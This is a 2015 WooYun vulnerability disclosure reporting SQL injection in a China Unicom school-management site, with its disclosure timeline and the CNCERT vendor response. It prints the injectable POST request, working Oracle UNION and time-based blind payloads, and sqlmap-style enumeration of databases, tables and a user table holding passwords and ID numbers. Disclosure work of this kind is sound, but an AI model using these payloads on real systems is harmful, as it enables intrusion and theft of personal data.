当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158202

漏洞标题:中国联通某站SQL注入漏洞(用户信息泄露)

相关厂商:中国联通

漏洞作者: 偶然

提交时间:2015-12-04 22:52

修复时间:2016-01-21 18:22

公开时间:2016-01-21 18:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-04: 细节已通知厂商并且等待厂商处理中
2015-12-08: 厂商已经确认,细节仅向厂商公开
2015-12-18: 细节向核心白帽子及相关领域专家公开
2015-12-28: 细节向普通白帽子公开
2016-01-07: 细节向实习白帽子公开
2016-01-21: 细节向公众公开

简要描述:

详细说明:

POST /CKindMessageControl/createCookies.do HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: application/json, text/javascript, */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/login.jsp
Content-Length: 36
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
checkCode=123456&checkKindCode=admin


Parameter: checkKindCode
Type: UNION query
Title: Generic UNION query (NULL) - 21 columns
Payload: checkCode=123456&checkKindCode=admin' UNION ALL SELECT CHR(58)||CHR(98)||CHR(105)||CHR(109)||CHR(58)||CHR(67)||CHR(67)||CHR(102)||CHR(114)||CHR(89)||CHR(87)||CHR(109)||CHR(106)||CHR(101)||CHR(66)||CHR(58)||CHR(119)||CHR(101)||CHR(122)||CHR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: checkCode=123456&checkKindCode=admin' AND 3836=DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(86)||CHR(122)||CHR(114),5) AND 'EEON'='EEON
---
back-end DBMS: Oracle
available databases [16]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] XXTY

漏洞证明:

Database: XXTY
[267 tables]
+---------------------------+
| APN_DEVICETOKEN |
| APN_USER |
| CHARGE_PACKAGE |
| CLIENT_CLASSRING |
| CLIENT_COLLECTION |
| CLIENT_COMMENTS |
| CLIENT_COMMENTSNEWS |
| CLIENT_FILETASK |
| CLIENT_KINDNEWSFILE |
| CLIENT_KINDNEWSINFO |
| CLIENT_LIMITMODEL |
| CLIENT_PRAISE |
| CLIENT_REPLYCOMMENTS |
| CLIENT_REPLYNEWSCOMMENTS |
| CLIENT_REPLYVIDEOCOMMENTS |
| CLIENT_SPACENEWMESSAGE |
| CLIENT_TEACHERLOGTEXT |
| CLIENT_VALIDATEPHONE |
| CLIENT_VIDEODEVICE |
| CLIENT_VIDEOSERVER |
| CLIENT_WATCHHOUSE |
| CLIENT_WATCHUSER |
| CLIENT_WATCH_FAMILYUSER |
| CODE_KINDPROVINCECITY |
| FAMILY_TRIGGERSLOG |
| KIND_ADVERTISING |
| KIND_ADVERTISINGTYPE |
| KIND_ANDROIDVERSIONS |
| KIND_ANSWER |
| KIND_BACKMODULE |
| KIND_CLOUDKINDUSER |
| KIND_CLOUNDKINDMESSAGE |
| KIND_DIARYINFO |
| KIND_FAMILYLOGTEXT |
| KIND_FAMILYLOGTEXTFILE |
| KIND_FAMILYPHOTO |
| KIND_FAMILYPHOTOTYPE |
| KIND_FEEDBACK |
| KIND_FEEDBACKASTATE |
| KIND_KINDMESSAGE |
| KIND_LESSONPLAN |
| KIND_LESSONPLANPHOTO |
| KIND_LESSONREVIEW |
| KIND_LINK |
| KIND_MANAGECLIENTTABLE |
| KIND_NEWS |
| KIND_NEWSCOLUMN |
| KIND_NEWSLOGINUSER |
| KIND_NEWSREVIEW |
| KIND_NOPASSMESSAGE |
| KIND_ONLINEMESSAGE |
| KIND_OPINION |
| KIND_PARTITIONDICTIONARY |
| KIND_PHOTOINFO |
| KIND_PHOTO_NEWS |
| KIND_PROFICIENT |
| KIND_REPLACE |
| KIND_REPLYOPINION |
| KIND_TEACHERWORKDATA |
| KIND_TRIGGERSLOG |
| KIND_TRIGGERSRESOURCE |
| KIND_VIDEONEWS |
| MSG_DEVICETOKEN_ANDROID |
| MSG_DEVICETOKEN_EASEMOB |
| MSG_DEVICETOKEN_IOS |
| MSG_EASEMOBMSGTASK |
| MSG_LIST_ANDROID |
| MSG_LIST_IOS |
| MSG_NOTICE_ANDROID |
| MSG_NOTICE_IOS |
| MSG_PNBUSLEAVEMSG |
| MSG_PNBUSMSG |
| MSG_PNLIFEHELP |
| MSG_RECEIVELOG |
| MSG_SENDSUCCESS_ANDROID |
| MSG_SEND_ANDROID |
| MSG_SEND_IOS |
| MSG_SMSMESSAGEBYEXCEPTION |
| MSG_SMSMESSAGEBYMANUAL |
| MSG_SMSMESSAGELOG |
| MSG_SMSMESSAGETASK |
| MSG_SMSMODEL |
| MSG_TEMPLIST_ANDROID |
| MSG_TEMPLIST_IOS |
| MYTEST_USER |
| NEW_PHOTO_STUPHOTOMSG |
| OA2_USER |
| QUICK_TABLE |
| SHIMIAO_USER |
| SHI_BUYBOOKINFO |
| SHI_CAPITAL |
| SYS_ACCESSFILE |
| SYS_ACCESSORIES |
| SYS_ACCESSORIESATTACHMENT |
| SYS_ACTIVITYC |
| SYS_ACTIVITYS |
| SYS_ATTENDANCE |
| SYS_ATTENDANCECOUNT |
| SYS_ATTENDANCEFILES |
| SYS_ATTENDANCELOG |
| SYS_ATTENDANCENEWS |
| SYS_ATTENDANCESTUSAVE |
| SYS_ATTENDANCEVIDEO |
| SYS_AUTOGRAPHINFO |
| SYS_CARDLOG |
| SYS_CHECKINFO |
| SYS_CLASS |
| SYS_CLASSEXAMINE |
| SYS_CLASSPHOTO |
| SYS_CLASSTABLEHISTORY |
| SYS_COMMENTS |
| SYS_CONFIG |
| SYS_CONFIG_COOKBOOK |
| SYS_CONFIG_DICTIONARYITEM |
| SYS_CONFIG_QUESTIONDIC |
| SYS_CONFIG_WEEKLYPLAN |
| SYS_COOKBOOK |
| SYS_COOKBOOKCONFIG |
| SYS_COOKBOOKEXPORT |
| SYS_COOKFILE |
| SYS_COOKINPICTURE |
| SYS_COOKMENU |
| SYS_COOKMSGBYDAY |
| SYS_COURSEWARE |
| SYS_DICTIONARY |
| SYS_DICTIONARYITEM |
| SYS_ERRORLOGIOS |
| SYS_EXAMINECOMMENT |
| SYS_FILE |
| SYS_FILELOG |
| SYS_HARDWARECFG |
| SYS_HOMEVISIT |
| SYS_HOMEVISITFILE |
| SYS_HOMEVISITMODE |
| SYS_INFORMATIONBANK |
| SYS_INFORMATIONBANKFILE |
| SYS_KINDACTIVITY |
| SYS_KINDBUS |
| SYS_KINDFILE |
| SYS_KINDMESSAGE |
| SYS_KINDMODULECHECKINFO |
| SYS_KINDVIDEO |
| SYS_KINDVIDEOCOMMENTS |
| SYS_KINDVIDEOFOREVER |
| SYS_KINDWECHAT |
| SYS_KINDWORKUPLOAD |
| SYS_KINDWORKUPLOADLOG |
| SYS_KINDWX |
| SYS_KMSINFOLOG |
| SYS_KMSLOG |
| SYS_KNOWLEDGEBASE |
| SYS_LEARNCOMMENT |
| SYS_LOGANDROID |
| SYS_MOBILEMODELOPT |
| SYS_MOBILEMODELOPTION |
| SYS_MODULE |
| SYS_MODULECHECKINFO |
| SYS_MODULEFUNCTION |
| SYS_MODULEKINDCHECKINFO |
| SYS_MODULERIGHT |
| SYS_NIGHTSTORY |
| SYS_PARENTALADV |
| SYS_PARENTALADVPHOTO |
| SYS_PHOTOCOMMENTS |
| SYS_PHOTOCOMPLETE |
| SYS_PHOTOTASK |
| SYS_PHOTO_STUACTIVITY |
| SYS_PHOTO_STUPHOTOMSG |
| SYS_PNMESSAGEFAILURE |
| SYS_PNMESSAGEFILE |
| SYS_PNMESSAGEINFO |
| SYS_PNMESSAGELOG |
| SYS_PNSENDMESSAGE |
| SYS_PNSENDMESSAGEOLD |
| SYS_PNSENDMESSAGETEMP |
| SYS_PNSENDMSG |
| SYS_PN_MESSAGEWORK |
| SYS_PN_MESSAGEWORKLOG |
| SYS_POSTMANAGE |
| SYS_PUNCH_MACHINE |
| SYS_QUESTIONNAIREINFO |
| SYS_QUESTIONNAIREMESSAGE |
| SYS_QUESTIONNAIRES |
| SYS_ROLE |
| SYS_RULESSYSTEM |
| SYS_STUACTIVITY |
| SYS_STUDENT |
| SYS_STUDENTACTIVITY |
| SYS_STUDENTBILLS |
| SYS_STUDENTCARDS |
| SYS_STUDENTEASEMOB |
| SYS_STUDENTEMP |
| SYS_STUDENTEXAMINE |
| SYS_STUDENTFAMILY |
| SYS_STUDENTHOLIDAY |
| SYS_STUDENTLEARNING |
| SYS_STUDENTLEAVE |
| SYS_STUDENTLOG |
| SYS_STUDENTPHYSICAL |
| SYS_STUDENTREGEASEMOBLOG |
| SYS_STUDENTSET |
| SYS_STUMORNEXAMINE |
| SYS_STUMORNEXAMINE_S |
| SYS_STUMORNEXAMINE_TEMP |
| SYS_STUNIGHTEXAMINE |
| SYS_SYSEMAILURL |
| SYS_SYSUSERLOG |
| SYS_TABLESALIASE |
| SYS_TEACHERARCHIVES |
| SYS_TEACHERARCHIVESFILE |
| SYS_TEACHEREXAMINE |
| SYS_TEACHERTRANSACTION |
| SYS_TEADAYEXAMINE |
| SYS_TEAHERARCHIVESMODE |
| SYS_TEAMONTHEXAMINE |
| SYS_TEATALKFILE |
| SYS_TEATALKTEXT |
| SYS_TEAWORK |
| SYS_TEMPORARYFILE |
| SYS_UPLOADFILE |
| SYS_UPLOADFILECOMPLETE |
| SYS_USER |
| SYS_USERCONFIG |
| SYS_USERINFOACCESSORY |
| SYS_VACATIONSTUDENT |
| SYS_VPFILEUPLOAD |
| SYS_VPOPTION |
| SYS_WECHATLEVELS |
| SYS_WEEKINFOWORK |
| SYS_WEEKLYINPICTURE |
| SYS_WEEKLYPLAN |
| SYS_WEEKLYPLANEXPORT |
| SYS_WEEKLYPLANREMARK |
| SYS_WEEKSPLAN |
| SYS_WXLOGIN |
| SYS_WXPHOTO |
| TEMP_STULEAVE |
| WEB_EMPLOYEE |
| WEB_KINDBASICINFO |
| WEB_KINDCLASS |
| WEB_KINDFOCUSPHOTO |
| WEB_KINDFRUIT |
| WEB_KINDGROUPPHOTO |
| WEB_KINDINTRODUCE |
| WEB_KINDMESSAGE |
| WEB_KINDNETPHOTO |
| WEB_KINDNEWS |
| WEB_KINDNEWSPHOTO |
| WEB_KINDRECRUITMENT |
| WEB_KINDTEACHER |
| WEB_KINDTEACHERMIEN |
| WEB_KINDUSER |
| WEB_KIND_FEEDBACK |
| WEB_KIND_LINKUS |
| WEB_KIND_MODULE |
| WEB_KIND_NEWS |
| WEB_KIND_NEWSFILE |
| WEB_KIND_OPINION |
| WEB_KIND_USER |
| WEB_PHOTO |
| WEB_PHOTOALBUM |
| WEB_REGINFO |
| WEB_TEXTBOOK |
| WEB_TEXTBOOKTYPE |
| WX_BACKUSER |
| WX_MESSAGEINFO |
| WX_MESSAGELOG |
+-------------------Database: XXTY
Table: SYS_USER
[24 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| ACCOUNTADDRESS | VARCHAR2 |
| ADDRESS | VARCHAR2 |
| BIRTHDAY | VARCHAR2 |
| CLIENTLOGINDATE | DATE |
| DESCRIPTION | VARCHAR2 |
| ENDONLINEDATE | DATE |
| ETHNIC | VARCHAR2 |
| FIXEDPHONE | VARCHAR2 |
| GENDER | VARCHAR2 |
| IDNUMBER | VARCHAR2 |
| ISREGEASEMOB | NUMBER |
| KINDID | VARCHAR2 |
| LOGINUSER | VARCHAR2 |
| MOBILEPHONE | VARCHAR2 |
| PARTITIONCODE | VARCHAR2 |
| PHOTOHEADURL | VARCHAR2 |
| POSTID | VARCHAR2 |
| PWD | VARCHAR2 |
| RFID | VARCHAR2 |
| ROLEID | NUMBER |
| STATUSFLAG | VARCHAR2 |
| USERID | VARCHAR2 |
| USERNAME | VARCHAR2 |
| USERNAMEAUDIO | VARCHAR2 |
+-----------------+----------+
--------+

lt1.png

修复方案:

版权声明:转载请注明来源 偶然@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-08 13:03

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国联合网络通信集团有限公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无